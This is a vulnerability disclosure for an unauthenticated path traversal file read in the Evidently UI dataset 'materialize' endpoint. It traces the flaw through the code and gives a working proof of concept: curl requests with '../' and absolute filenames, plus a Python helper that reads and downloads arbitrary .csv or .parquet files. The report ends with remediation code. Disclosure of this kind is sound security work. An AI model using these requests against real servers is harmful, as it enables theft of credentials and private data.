Unauthenticated path traversal arbitrary file read in Evidently UI dataset materialization #1887

## Summary

The Evidently UI service exposes a dataset "materialize from source" endpoint that accepts a fully attacker-controlled `filename` and passes it, without any containment check, to the local blob storage, which opens `posixpath.join(base_path, filename)`. Because `posixpath.join` preserves `../` segments and lets an absolute path replace the base entirely, an attacker can read any `.csv` or `.parquet` file that the server process can access, including files outside the workspace directory, and then download its contents through the dataset download endpoint.

In the default configuration (`evidently ui`, started without a secret), the service runs with `NoSecurityComponent`, so every endpoint is unauthenticated. The result is unauthenticated arbitrary file read over the network.

## Affected Versions

Confirmed on v0.7.21 (the latest release at the time of reporting). The vulnerable code path is present in the `evidently.ui.service` package.

## Details

The endpoint `POST /api/datasets/materialize` (`src/evidently/ui/service/api/datasets.py`) builds a data source from the request body and materializes it:

```python
@post("/materialize")
async def materialize_from_source(
    data: MaterializeDatasetRequest,
    dataset_manager: ...,
    user_id: UserID,
    project_id: ProjectID,
) -> MaterializeDatasetResponse:
    df = await data.source.to_data_source(user_id=user_id, project_id=project_id).materialize(dataset_manager)
    dataset = await dataset_manager.upload_dataset(...)  # stores df as a new dataset you can download
    return MaterializeDatasetResponse(dataset_id=dataset.id)
```

When the source is a `FileDataSource` (`src/evidently/ui/service/datasets/data_source.py`), `filename` is taken verbatim from the request:

```python
class FileDataSource(SortedFilteredDataSource):
    project_id: ProjectID
    filename: str
    is_tmp: bool = False

    def read(self, storage):
        df = FileIO(storage).read_file_from_storage(self.project_id, self.filename)
        return df
```

`FileIO.read_file_from_storage` (`src/evidently/ui/service/datasets/file_io.py`) only validates the file extension, then reads the path as a blob id:

```python
def read_file_from_storage(self, project_id, file_id):
    _, file_extension = os.path.splitext(file_id)
    if file_extension not in self.ALLOWED_FILE_READERS.keys():  # .csv / .parquet only
        raise HTTPException(status_code=400, detail="Extension not allowed")
    file_content = self.file_storage.get_dataset(file_id)   # file_id == attacker filename
    ...
```
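The extension allowlist does not help against traversal, because `os.path.splitext` only looks at the final suffix. The stand-alone mirror below makes this concrete; `ALLOWED` and `passes_extension_check` are hypothetical names, the allowed set is assumed from the `.csv / .parquet only` comment in the excerpt, and only the `splitext` logic is taken from the quoted code.

```python
import os.path

# Assumed contents of ALLOWED_FILE_READERS' keys, per the excerpt's comment.
ALLOWED = {".csv", ".parquet"}

def passes_extension_check(file_id: str) -> bool:
    """Hypothetical mirror of the extension-only check in read_file_from_storage."""
    _, ext = os.path.splitext(file_id)
    return ext in ALLOWED

# Both attack filenames from the proof of concept pass; only the suffix matters.
for candidate in [
    "../../../../../../tmp/secret_outside.csv",
    "/tmp/abs_secret.csv",
    "/etc/passwd",
]:
    print(f"{candidate!r}: {passes_extension_check(candidate)}")
```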

`DatasetFileStorage.get_dataset(blob_id)` -> `BlobStorage.get_blob_data(blob_id)` -> `FSSpecBlobStorage.open_blob` -> `FSLocation.open` (`src/evidently/ui/service/storage/fslocation.py`):

```python
@contextlib.contextmanager
def open(self, path: str, mode="r"):
    with self.fs.open(posixpath.join(self.path, path), mode) as f:
        yield f
```

There is no normalization or base-directory containment. `posixpath.join("workspace", "../../../../etc/x.csv")` escapes the workspace, and `posixpath.join("workspace", "/tmp/x.csv")` discards the base entirely and reads the absolute path.
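This standard-library behavior can be confirmed in isolation. The snippet uses only `posixpath`, with the workspace path and filenames from the proof of concept; `normpath` is a lexical approximation of what the filesystem ends up opening (it does not follow symlinks).

```python
import posixpath

# Workspace path and filenames taken from the proof of concept.
base = "/tmp/ev_run/workspace"

# Relative traversal: join() keeps the ".." segments verbatim...
joined = posixpath.join(base, "../../../../../../tmp/secret_outside.csv")
# ...and collapsing them shows the file that is actually opened.
# Surplus ".." segments at the filesystem root are simply dropped.
resolved = posixpath.normpath(joined)
print(resolved)  # /tmp/secret_outside.csv

# Absolute component: join() discards everything before it, base included.
absolute = posixpath.join(base, "/tmp/abs_secret.csv")
print(absolute)  # /tmp/abs_secret.csv
```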

The materialized rows are then stored as a normal dataset and can be retrieved verbatim through the unauthenticated read routes `GET /api/datasets/{id}/download` and `GET /api/datasets/{id}`.

The only restriction is the extension allowlist (`.csv`, `.parquet`). These formats commonly contain database dumps, credential exports, model training data, and PII on the same host.

## Proof of Concept

Prerequisites:
- `pip install evidently==0.7.21`
- A sensitive `.csv` file outside the workspace, standing in for any data export or credential file on the host.

Steps:

1. Create a sensitive file outside the workspace:

```
printf 'secret_col,value\nADMIN_DB_PASSWORD,hunter2_supersecret\n' > /tmp/secret_outside.csv
```

2. Start the Evidently UI with its default configuration (no secret = no authentication):

```
mkdir -p /tmp/ev_run/workspace
cd /tmp/ev_run
python -c "from evidently.ui.service.app import run_local; run_local(host='127.0.0.1', port=8011, workspace='/tmp/ev_run/workspace')"
```

3. Create a project (unauthenticated):

```
curl -s -X POST http://127.0.0.1:8011/api/projects \
  -H 'Content-Type: application/json' \
  -d '{"name":"poc","description":"x"}'
```

Output:

```
"019ecac5-bf25-7a67-85ab-b2071b844ca1"
```

4. Materialize a dataset from a traversal filename (PROJECT_ID from step 3):

```
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
  -H 'Content-Type: application/json' \
  -d '{
        "name": "stolen",
        "source": {
          "type": "evidently:data_source_dto:FileDataSourceDTO",
          "filename": "../../../../../../tmp/secret_outside.csv"
        }
      }'
```

Output:

```
{"dataset_id":"019ecac6-2ade-776e-bf50-a6ae18a25521"}
```

5. Download the stolen file contents:

```
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-2ade-776e-bf50-a6ae18a25521/download?format=csv"
```

Output (contents of `/tmp/secret_outside.csv`, which lives outside the workspace):

```
secret_col,value
ADMIN_DB_PASSWORD,hunter2_supersecret
```

An absolute path works identically (the join discards the workspace base):

```
printf 'k,v\nABSOLUTE_READ,works\n' > /tmp/abs_secret.csv
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
  -H 'Content-Type: application/json' \
  -d '{"name":"abs","source":{"type":"evidently:data_source_dto:FileDataSourceDTO","filename":"/tmp/abs_secret.csv"}}'
# -> {"dataset_id":"019ecac6-686e-7e6d-9afe-23697614e585"}
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-686e-7e6d-9afe-23697614e585/download?format=csv"
# -> k,v
#    ABSOLUTE_READ,works
```
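To re-check a fix, steps 4 and 5 can also be scripted with the standard library. This is a sketch: `BASE_URL`, `build_materialize_request`, and `read_remote_file` are illustrative names, while the endpoints, query parameter, and JSON payload are exactly those used in the curl commands above.

```python
import json
import urllib.request

BASE_URL = "http://127.0.0.1:8011"  # matches the run_local() call in step 2

def build_materialize_request(project_id: str, filename: str) -> urllib.request.Request:
    """Build the POST /api/datasets/materialize request from step 4."""
    body = {
        "name": "stolen",
        "source": {
            "type": "evidently:data_source_dto:FileDataSourceDTO",
            "filename": filename,
        },
    }
    return urllib.request.Request(
        f"{BASE_URL}/api/datasets/materialize?project_id={project_id}",
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )

def read_remote_file(project_id: str, filename: str) -> str:
    """Materialize `filename` as a dataset, then download it as CSV (steps 4 and 5)."""
    with urllib.request.urlopen(build_materialize_request(project_id, filename)) as resp:
        dataset_id = json.load(resp)["dataset_id"]
    url = f"{BASE_URL}/api/datasets/{dataset_id}/download?format=csv"
    with urllib.request.urlopen(url) as resp:
        return resp.read().decode()
```

Against a running instance, `print(read_remote_file(project_id, "/tmp/abs_secret.csv"))` should print the file contents on a vulnerable build; after a fix, the materialize call is expected to fail with an HTTP error instead.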

## Impact

An unauthenticated remote attacker (or, when a token is configured, any authenticated user) can read arbitrary `.csv` and `.parquet` files anywhere on the server filesystem that the service process can access, and exfiltrate their full contents. This discloses database exports, credential/secret files, training datasets, and other tenant data stored on the host, regardless of which projects the attacker can access.

## Suggested Remediation

Resolve and contain the requested path before opening it. For example, `FSLocation.open` (and the other path-taking methods) could normalize the joined path and verify that the result stays under `self.path`, which also rejects absolute paths that point outside the root:

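```python
import posixpath

# Helper for FSLocation; route open() and other path-taking methods through it.
def _safe(self, path: str) -> str:
    # Join, then collapse "." and ".." segments. An absolute `path` replaces
    # self.path entirely, so it is rejected below unless it lies inside the root.
    full = posixpath.normpath(posixpath.join(self.path, path))
    base = posixpath.normpath(self.path)
    # Accept the root itself or anything strictly below it; appending the
    # separator keeps a sibling such as "/ws2" from matching root "/ws".
    if full != base and not full.startswith(base + posixpath.sep):
        raise PermissionError("path escapes storage root")
    return full
```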

Additionally, in `read_file_from_storage` / `FileDataSource`, validate that `filename` contains no path separators or `..` segments, and resolve dataset files only by their stored blob id rather than a client-supplied path.
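The filename validation suggested above could look like the following sketch. `validate_filename` is a hypothetical helper, not an existing Evidently function; it assumes legitimate dataset filenames are bare names such as `data.csv`, and it is meant to complement, not replace, the containment check in the storage layer.

```python
def validate_filename(filename: str) -> str:
    """Hypothetical check run before FileIO.read_file_from_storage."""
    # Empty names and bare dot-segments never refer to a real dataset file.
    if filename in {"", ".", ".."}:
        raise ValueError("invalid filename")
    # Refusing separators blocks "../" traversal and absolute paths such as
    # "/tmp/x.csv"; backslash covers Windows-style paths, NUL is never valid.
    if "/" in filename or "\\" in filename or "\x00" in filename:
        raise ValueError("path separators are not allowed")
    return filename
```

With separators forbidden, a `..` segment can only appear as the whole name, so names like `report..v2.csv` remain valid.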
